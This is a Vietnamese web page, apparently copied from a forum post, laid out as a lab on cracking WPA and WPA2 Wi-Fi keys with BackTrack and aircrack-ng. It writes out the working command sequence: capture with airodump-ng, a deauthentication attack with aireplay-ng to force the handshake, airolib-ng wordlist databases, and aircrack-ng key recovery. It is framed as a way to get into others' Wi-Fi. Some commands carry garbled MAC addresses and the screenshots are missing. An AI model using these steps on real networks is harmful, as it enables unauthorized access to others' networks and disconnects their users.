Crack Wifi khóa bởi mà wap. Ko yêu cầu thêm thiết bịtải về 27.2 Kb.
Chuyển đổi dữ liệu30.08.2016
Kích27.2 Kb.
Crack Wifi khóa bởi mà WAP.Ko yêu cầu thêm thiết bị. Tất nhiên là ngoài thiết bị bắt wifi của bạn(không cần mua các chuyên dụng để bắt wifi như các bài viết khác).
LAB: CRACK KHÓA WPA TRONG MẠNG WLAN
THIẾT BỊ :
vMột AP làm AP target
vMột PC có card wireless làm client target.
vMột PC có card wireless làm attacker
vMột đĩa CD backtrack 3.0 beta

YÊU CẦU:
vĐể crack được wpa thì yêu cầu phải có môi trường cơ sở dữ liệu SQLite. Ta có thể download SQLite Tại đây
nếu download không được thì xem hướng dẩn TẠI ĐÂY
vMột list chứa các password, list này phải đảm bảo có chứa khoá của mạng mà ta cần hack
vMột list chứa các ssid, list này phải đảm bảo có chứa ssid của AP target.
Bài lab này sẽ tiến hành crack các loại khoá là WPA PERSONAL TKIP, WPA PERSONAL AES, WPA2 AES và WPA2 TKIP+AES.

CÁC BƯỚC TIẾN HÀNH CRACK:
vCÀI ĐẶT SQLite như sau:
tar xvzf /root/Desktop/sqlite/sqlite-3.5.7.tar.gz
cd sqlite-3.5.7
./configure --prefix=/usr/local
Make

CRACK WPA TKIP:
·Chuyển card wireless về monitor mode như hình sau:


• Dò tìm kênh và MAC address của AP target và client target bằng lệnh airodump-ng ath0 , kết quả dò tìm như hình sau :

Tiến hành bắt gói trên kênh và MAC address của AP target vừa tìm được bằng lệnh:
airodump-ng –c 1 –w/root/desktop/capture/wpa –bssid 00bf:05: d6:0c ath0

Tiếp theo, ta dùng tool aireplay và MAC address của client target để tạo ra 4 bước bắt tay với AP target :
Aireplay-ng -0 1 –a 00bf:05: d6:0c –c 00b674:78 ath0

Quay lại màn hình bắt gói airodump quan sát ta thấy quá trình bắt tay đã diễn ra như hình sau:

Thế là ta đã capture được 4 bước bắt tay với AP target.
• Dùng tool airolib-ng để tạo cơ sở dữ liệu cho quá trình crack bằng lệnh airolib-ng vnpro_gtvt_hcm init
với vnpro_gtvt_hcm là tên của cơ sở dữ liệu được chứa mặc định trong home folder.
Sau đó, ta import các list password và list ssid vào cơ sỡ dữ liệu vnpro_gtvt_hcm như sau:
Airolib-ng vnpro_gtvt_hcm import ascii essid dictionary.txt
/* với dictionary.txt là list chứa tên các ssid */


Airolib-ng vnpro_gtvt_hcm import ascii passwd password.lst
/* với password.lst là file chứa các password */

Ta kết hợp các ssid với password với nhau sau khi import thành công list password và list ssid bằng lệnh:
Airolib-ng vnpro_gtvt_hcm batch
kiểm tra lại số ssid và password hợp lệ mà ta có bằng lệnh sau:
Airolib-ng vnpro_gtvt_hcm stats

mở một shell mới chạy tool aircrack-ng để tìm khoá :
aircrack-ng –r vnpro_gtvt_hcm /root/desktop/capture/wpa*.cap


Sau khi lệnh thực hiện xong, ta thu được key

Quá trình crack khoá WPA AES, WPA2 AES và WPA2 TKIP+AES bao gồm các bước thực hiện hoàn toàn như việc crack WPA TKIP. Tiếp theo, ta chỉ kiểm tra quá trình tìm ra khoá của các loại khoá trên
CRACK WAP AES

Khoá tìm được :

CRACK WPA2 AES


CRACK WPA2 TKIP+AES 

Chạy lệnh tool aircrack để tìm key


Tìm được key là vnprogtvthcmtkipvaaes (vnpro gtvt hcm tkip và aes)


Nguồn: http://chiplove.biz/family/showthread.php?t=91066-huong-dan-hack-pass-mang-wifi#ixzz1XGF4SYz3


Cơ sở dữ liệu được bảo vệ bởi bản quyền ©hocday.com 2016
được sử dụng cho việc quản lý

    Quê hương